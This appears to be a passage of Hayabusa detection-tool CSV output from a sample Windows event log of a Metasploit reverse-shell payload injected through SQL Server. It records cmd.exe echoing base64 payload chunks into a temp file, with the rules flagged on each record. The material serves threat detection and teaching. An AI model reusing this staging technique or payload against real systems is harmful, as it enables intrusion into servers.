AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x106c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:09.995 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL 
Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:09.995 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:09.997 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:10.269 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFWL7IHsEQQA5bjUAuwAH1ajfhfFABqpn0EAo0RAQQCjBBgDADMKxUhPjgBXjUUM5iGOc6pRx+HwF0EARNJABJUdQDxBUG7WTAAAaOBfQADo2KQAAIPEBFNTU2hMQKcA6Ds+ANSLVQyGIgiLYEx+QQBSUI1V9FFS6GRKAACLVfSNRfyNTftQUWgU0kABUujeSgA3hcAPhZoEPEqLNWj6QKoPvkX7g8Bag/g5D4dmBAAAM7iKiAgXQAD/JLaYFkAAi1X8UsAVbMFAs4PEBDvDoxBUnnAPsT0E0C1o+M9AE+htLAAA6SuTAADHBdQCQQABAAAA6R8Efk+JHRRZQADpFAQrAItF/FD/FVOh2ACjGPpAq+kWMgAAi02l2v8LbMGPAKOoAkEA6enPAAA5HWACLAB+DWgc0UAAzhQLAABuxATHJmACZAD/////6USc>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xc48 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:10.269 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL 
Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:10.269 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:10.271 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:10.544 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1184 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:10.544 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:10.544 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in 
CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:10.546 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:10.819 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x224 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:10.819 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:10.819 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:10.822 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy 
Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.094 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xec4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.094 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.094 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.096 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.368 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x274 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.368 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.368 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.370 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.643 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe28 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command 
Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.643 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.643 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.645 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.917 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xf18 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.917 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows 
Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.917 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:11.919 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:12.191 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1098 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:12.191 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:12.191 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload 
injectection for reverse shell (MSF).evtx +2020-08-01 22:58:12.193 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:12.463 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x774 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:12.463 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:12.463 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:12.466 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 
+2020-08-01 22:58:12.737 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo mbjjQADt1qH1AkEAJcQYg/gBdSWvoKQCqgBLoAICABMNqC5BAEBQofAXfABQUD3jaONA8f/WWcQYgz1gAkEAAHUlURWkAgAAoaD8QQCLie4LQQBSUKHwlUFxUFBRpBjjQM//C4PEGIsVnP2DAKGYAkEAiw2oC0EAUsKh8Nf9GFBQLrbA4kAA/7thRcjcHTDCQACDxBiF4PbEROiLtdoAAN0FGcJAANx1yKHwF5UANxWyC/gAg7oI3V3I2wVSAkGF+03I3A0g1t4A3bokUFBSfGjiLwD/1t8tkAJBAC/wF0FRg8QQ3E2t3RwkUFChDQtBAFBoCOJAAP/W94kCQQCDxI2FQZ9CN5FIL0hB9Z/4QpKQQfhBSEJLQ5v8/ZuZnyf4mZCYL0D1ky8nm0pJP0iQkpDW+P0vL0r4Qjf8QJJJ+EmYSvmSSfxJk0hCm58/k/mZQ5I3Q5NJQZhLS0BBN5g/1plB+Jg/SpJLS0v1N+mvaAAA1olVi4lV5IlV8GRV4IlVQYlVh4sVrAJBADPbg8n/iv//vX+F0omh0HxF2P////+JRdwPwoZN7gCL2dkLQQCDwhiJVfyLFaz1QQCJVfiLVfztUviJVciLVfw79fxtFa0xi1UgO8qLVfwevYtByIn90ItC/IsKi1IEOVXcT1XExg1/BTlNjnIGiU3YiVXci1X8QFJJOVX0iVXMyRZ8CItV8DuAyHcM01XIiVXwDn/MiVX0i1W5OQadf9iNBTk46HcGiU3oR1Xsi5hgA/qLVcxn2ovt4APRi038iVXgi1U7i0kEE9GLTfiJVeSLVfyDxSA5iU3J9V/QiVX8D+tO//8tgcH0AQAAagCDQQCk6AM1AFBR6CV/AACLTW/JRaqLRSCZPwX0AQCkaCQDAACD0QCJVdRRUOgD7G+PME30iUXYi0VNagAF9AEAAGjoAwCnIdGtiVXMUVDop34A9ItN7P5F8ItF6Gp2BfQBAABo6AMA14PRAIlV9FFQ6L9+AACBx2EBAABqMoPTAGjoAwASU1eJReiJA+zoon4AAItN5IvYIefgagAF9C0AABOWYwAAg9EiiVXMUVDogX4AAIlFL6FsAkEAhcKJVeRNjioBAADuFbAXQRyhqAtBAKJQaCzhQAD/1qGOF0EAqQ2oCyUAYFBQmFFo2OBJANvW3lX0i0Xwiz3wF0EAg8Qki0EUUlChrQJBAFeZUlBRU+gffgAAiw2oC0EAUotVtEKLRYBXUlBX55lopilAADyBoawCQQADTfCZi22LReiDxDDVwYtN7IlVxBtN9NeLz1NQofAXQQBTUosMWFfdUrvRfQA4i8pmVcQJi1XMSlLnrkVBiU386Lp9ZwCLTfgryKFF/BvCUGXwF0EA8Ytd2ItV0It91IsVK8r3VaUb11BSUVBQoagLQQBQaADO+QD/1i9N7ItVRS1Q7EEAiz2KF0EAg8QwUYtN4LNX+VJQi0XkUFHoXn0A7VKdVdxQ>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1284 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 
22:58:12.737 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:12.737 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:12.739 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.010 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xa2c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.010 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 
+2020-08-01 22:58:13.010 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.013 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.286 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1340 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:13.286 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL 